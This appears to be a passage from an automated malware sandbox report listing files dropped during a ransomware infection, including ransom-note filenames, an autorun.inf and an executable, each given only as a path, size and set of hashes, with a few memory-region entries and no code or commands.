                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          841906a88ca6bdd6c66e212c5818ef93e9036aa3d4b2eb782ef5ba6c20bd0511aa171d6a57613ca917716dfdd219aa931f70fcfc4e4d21486ba9189946cee731

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          352B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          3ccca4782410d78964d2bccbf11e0c7b

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          a8eaffcf6a561b6796ae613564ae62cf901875b6

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          7720db970d068df062554cbef6559556f295fafc3365365ba45cc3a1778f1563

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          3ff75068a77aa98d34e97c8ec5e4506b5b73bc774650754e889347581ed3abc7bb3d389dbba1bf39f833104027c397f8b904cf4ffdb01949b2a70c0d2248ae7d

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          334B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e89dc1ea4acabbcaff9d762788fa8054

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          3240aea7caa47096584e7072a5a632f783aa9033

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          0bc0a6bc0475a15f5182930b0e6ad072413e9b98bdbafa01b94fdc862941f8c0

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          d6dfe6000a5689d8dd2f4cffb7950504c006dd33f0ecb454c02504228dc93cb1ee10eeb39294ad4858798ca5e063094dd3cf44071078364ccad5cd2c600ab972

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          12271da77e8c2d9b6dc02ddc5e0f7da2

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          beeb2a988c94dc8b2e177b42351cbba6bc9f0be7

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          cbfd51fa02d8dff150e379ebdbe3cc540186bae4eee2e27a069ce9aff5ad3770

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          74c5dd1c9d2c67e9258050b3f70fbfc6591c783758366066de28357d5de4690caee63a5671aac9a9023b531e8202927ce5033442fb1cfd1d3372c5fe15526a1c

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          d733471dfe7d599e2bef98dd10faab2c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          8720ca9415fc4727527e68a9fcf3f4caaad22a3e

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          4b41830708ee18da84f56c8a18f7db314fa3f0b66b42e1e1df5f5e61b88acc12

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          3041378e8695174a2b9cf5cd8c5cd5eed668adb764b66c0f5fcd72d476f4b14856487248aeecc945e2686cee3922b543b8824216e03ebcc8efdf08e87f11b846

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          7c0599d19821b2dce5bea2de08582ca6

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          72985db9472aa3e04bc65f8bf803d0fbd643946b

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          3b08297c2154a30e2ed89da36f04855ec23475c405801e1e7657c8b3750a420e

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          1cd9acd90664b7254a35919340dcb458c7a78ebebc979eea22b489948be5af3f885ae1e9129c63399f21ac45380f4d47fee1e7e1bbdcbd12541f225a390f9381

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Administrative Tools.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          8136b4b1f10bbc65bb717edf052f2612

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          2874a062562a528548632a737eb3da3a4e6c3a2a

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          66f3e5ca7f609b6fc61878dbe83436efafb74e02fbbd55ab2313b2f39f48a518

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          3a5ce25fbdb32c14d914403143d0627d0d96e20a1c5c7ba3355835e47b7268ffa1b6697cf9bb72ca63209b7eae6271fa9cda6e70ad9a5ecaf4ff9fcd7a7fdd34

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          a58b698b71cace8096b1e2927c73af65

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          7eafad943ab634a1274bb379f9bbb1ea47c8f35d

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          6d127c9e2dabeecd3b04a6609dfaa5040150d316e68eb53bb02592d58114d051

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          fcaafb6780f03eafff856d364640c0891274ca2277e36d478550a1af5b162bf3150fae4ed07df74846298474144d921ab901e2fae9653c377cfd609556d06968

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          405B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          d30ee9c0e8213f84ece6ab3b16732ecc

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          297d8f14934fb1518c0c86e4bb38f04546fe3261

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          bd373ac6509bb5eb7be7f2038b71cae866dab2ea024ac8e3af5e5b0300431c38

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          c69839a118bbc466cb571e39ce23f3d811a040291c32e424c144d451899028e45323c1e79fd2b82b9e872f451ccbc9bcf2ad487278d2201cd75ed1c286cf314b

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          409B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          5ebf64c549186651d0d032f5f9e19c9b

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          0b1429a872768a3c11f9df7731c285a7cd3f236c

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          8d75f15cb247fd82fd650d8191556ca3557f9f183419b0ea6285a4e4ae0e7fa7

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          dfe329d936acfb80034ddcbe2b5fae8cc313947ebda185ec7459808bcf5f69cbeca2e8f08ed41d42d10476598d33eb89e76e76658498785c671dcd0328e50206

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          335B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          8c3a1c818be4351e1ca556b0ebb968f3

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          2d869e1b34297bb5593793765316bf3e7859d9a7

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          5884a48c5b280d78697e4d2bba4aaf2d694f65ba39ff924d16767a1e923225ef

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          ba25a665b26a87d7cd03cc7180f4ab258e8f8daa5acd1b5ac65fbd2db1ee10248b6d2ad4bc1265adc21e9fca38ea749d663885b732ad55b0c08cbabfa6cc5fda

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          08df280138797de382aa1351eceb03f4

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          b31bcccfd6f20235762deea8f2863d5bd87f8a79

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c048f1b2562fa9f7640cf31a1616250d3c532fe239d497842542882b1c5b8c22

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          a32578b13e7013fe14e4c64bc72cd7294b4bb074aed348505a1a5752a4f91f874ccf2d408bd645a74156c23f734ed8548c7da950788fb3cebac6d363fe0d0e00

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          624999ee1f909edf35ccb21495869e11

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          c41b52133e61d39f4359f4d63cade7f80544cb7f

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c36961d91e2d42cdcb3ffdc7dd7f1329a4a68ff0df6c95fc2a77817b44a2ce9a

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          328660bc289b6a2f45a26bd00a909fc41d093b3e680cba74cb91f7c1540ef9915d5c5f868bac824428642f13e401addb4caeb2d7da2fab8319b2ad74ef80402b

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.153_none_90dc0b923cd83016\Square44x44Logo.targetsize-44_altform-unplated_contrast-black.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          296B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          f982009e193ee10fa58000c16c9cf9c7

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          8f77bc5fb18b7b4d577e089efc23968f1e1f4a11

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          e40f28a265224a2294c8fb0dffce7eba5a52b7bc4691397fba60f8cf327acd1b

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          db9bfee5b415c9b22eafc22432875e0ccaf7490d9ec839d97e5edb72b8b78efa0747b0273caf2b586e39d5be02755d144bd6436605dfcf50886cee888ef30c62

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.153_none_90dc0b923cd83016\Square44x44Logo.targetsize-44_altform-unplated_contrast-black.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          296B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          5275b557720e35a0040a3db326f0a746

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          23d1a0dcbfe335b6914565c4575d14388d012e44

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          00ddaf070bbafad5394946777a0d1921e6cb194c58786b0a89dd2582360afce5

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          2e8246f6e9ec78357934b71eb2d538168a553e156291f199183824a2e5ef496f340959f3cea1854e1d6749b8c5f2397880f420ba1013a026045fc3df929a2f66

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.153_none_90dc0b923cd83016\Square44x44Logo.targetsize-44_contrast-white.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          276B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e60067d152b6d1806b83b02073f7cb05

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          af2ae88093fddeadb81cf18e23fa17597fd54b7d

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          fef89f298b067b3978ac9b4d22fd32e950f300a0b48ec4f75c66ed6339eeaf18

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          48104e7bdb7a44d237d46be5416b5926b52de2b0b2943a316ec395da6a71d36ec39eaeab4226e51a4ee68d307d51c34e014aea43ecadf7b5a9ee36dcd5828b7e

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.153_none_90dc0b923cd83016\Square44x44Logo.targetsize-44_contrast-white.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          276B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          307cc2ae2c291affc4df45213611e86a

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          36b8a05fdb366c7f5995ab7e1a5815b1e8d2afbf

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          98070a1d208bcf9d2d000bf5b971550c4a80bcd93c0b7e5376e5205275f2b27a

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          88c2a044027e304738ecfe23ceffc331d090b4f203d572a14c395eaaa8f7e40e581f6314224b5e52262af484387d131e21a87c6e0ef94f9b4b8c7c290e4b76ca

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.964_none_90d24b203cdf4e96\Square44x44Logo.targetsize-44_altform-unplated_contrast-black.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          296B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          7fca1e07afb5492b82fa37f5a4ceee0d

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          a0dcbf968d1973291e9faedd7e326392dc6f14aa

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          306c095ec1322d58f79f7cda9cc81bd882f7345d43fbc809a38a477ab4caa8e4

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          09bc4f03403230f4164ec4c74c19a1c200b7d6cbaff7ea1187cd9168872a50543437fa7532e84bf9482af9c87044466c81bc2a74e25eb7fd474e6772e94a9c80

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.964_none_90d24b203cdf4e96\Square44x44Logo.targetsize-44_altform-unplated_contrast-black.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          296B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          3d9ca75370df7e01683b4805e04fe72a

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          d2d753808c4e5a8a04fe0e3f749589b3fb90e243

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          513b8ab77ced0d33548fdb02eddb6febc02662089dbe674c5605850b0c1a10f0

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          c172ed7e500509c76785bfeaea50d8aae3abc3fe0ce9c5eac9ad4658ee3878a45f389561d02e53c5d137c389fbf0009b28f7e5aefd5534b763edbcfe2d241f07

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.964_none_90d24b203cdf4e96\Square44x44Logo.targetsize-44_contrast-white.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          276B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          7011cc3f278ae0b8b34e0c5d5d19761f

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          3fb38b55bc3aebc8a8fbab78890764ed88fadce1

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          f5a7e1999d1c86fed61177e71db2bb4cfe9b7520606c6bea565c7998f8effd47

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          0aa8d8eef991c515074d83a80b34bee65309388cdf8f7561d9cd078d421ccc2282def5bf87413a67f7b2b88cc48cbf037355d75f7015ebc53cbf0d38befc7ecf

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.964_none_90d24b203cdf4e96\Square44x44Logo.targetsize-44_contrast-white.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          276B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          44ff98e41ccfb53070fd170a3654f16f

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          71a8cd016e3811a1f98beaaafc05b999ea3aeae8

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          f94a36e830f53acc0f61d4dfc6a408eb564f8656acc67190fe501ffd048c6de8

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          7bd01c157eed6d8e474ff883144a9fade319711c04724369582233fd3968e3372e6870166dbabaa76a9926edc7e9f848c73280dd09309384d9c118644cf92714

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\WinSxS\wow64_microsoft-windows-onedrive-setup_31bf3856ad364e35_10.0.19041.1_none_e585f901f9ce93e6\OneDrive.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          c4c145daad5242c969797fa3b92a396e

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          f7c4d34794077f5ee284534b08bfbf082bebe3ff

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          25602fbc621b70b902eb966be901b8a60489225cb01a526440caea32669c800c

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          3f8e33aa849fc8bc88a16b4775c4fc4fc5a28aa11b461de61b061b677cae9338abfc40471488eef88a9da1c8dbc070002c6152272c1977a989660c2720a3a60a

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\consulta\Consulta\Consultas.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e72e434376a929171e067417d709117e

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          cdc800ab6f551fd3e54b339771bb38bad32952f1

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          20462dfef2d6b7971656712445d566450b9513c4b6ad16bc7ae351cc4d51a1b7

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          e3c8e6997cf650e95478589bcdedea6d948a2383a548e427fe182a915d84033ee344478ce1013db2a5a80191e5c2f940a0016be7a7964aec72ab0a9824dd9ecf

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • F:\$RECYCLE.BIN\KRAB-DECRYPT.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          124dd46e6812b12dfba10e0022a71cab

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          2c702264a255a0e8e046508e9fdf1775598e53c1

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          7ec12f5fd3a93efec122a238bfb7b3b61780c67ccf466385f93bcd3f77c13e07

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          c7ec82d9bbbb765ccbc4c03e1ef67d0df4b066c555ebdab1b78323fabc45e8fa7443d9279631aab1be8f366bfa03b078e0aaabef77151cb9944e8d36ccc6cfd8

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • F:\$RECYCLE.BIN\S-1-5-21-1045960512-3948844814-3059691613-1000\HYEOAMLLU-MANUAL.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          c6f61cf4a06702ebd14f34b0970d2d5c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          fdd366b33fc1937590e876e849df27a31f03c663

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          258de43e609300c05198676158f1ffedebf6596844e5b54dd17cd006b8fe0359

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          d7f272e22e0058f445d1bf980f47e3389de07445be51c4e90efbaf3aa6e50fb9836330d9d58f93d7892fb79c223f7934c3e4ba8a3a7f428a645393d632376930

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • F:\autorun.inf
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          102B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          5513829683bff23161ca7d8595c25c72

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          9961b65bbd3bac109dddd3a161fc30650e8a7096

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          94e323bd9071db7369ade16f45454e7a0dbfb6a39efddc1234c4719d1f7ee4c2

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          308c84446106cda0a71e37b0de46aaf4b7361f9ddcc3c4c29f8e87da8acb606525dce8a42caf9d74e708c56b31c524f9535a2f5f4757c6c357401da1c495ddb6

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • \Device\HarddiskVolume1\$RECYCLE.BIN\S-1-5-21-1045960512-3948844814-3059691613-1000\desktop.ini
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          129B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • \Device\HarddiskVolume1\Boot\cs-CZ\HOW TO DECRYPT FILES.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          993B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          a524bbb48b87900320cd5b0540a097fd

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          ca9e4f8522b464b434ce5495d12ce70bb44cb729

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          3d590a363dd1028909c16952ffcd3a391131e94c64894753973874ba910727a8

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          cc773a906f2ade7cdbe9faaf0d2d47518e139e26c7e31b576e8d89393a3093ab2403c1998f15b657f205544f5e6dc506e924ba531c9161340073fdf6cf87f1cf

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • memory/372-106-0x00000000001D0000-0x00000000002B0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          896KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/372-239-0x00000000082B0000-0x00000000082C2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/372-218-0x00000000082E0000-0x0000000008346000-memory.dmp

                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                        • memory/372-246-0x0000000008C10000-0x0000000008C4C000-memory.dmp

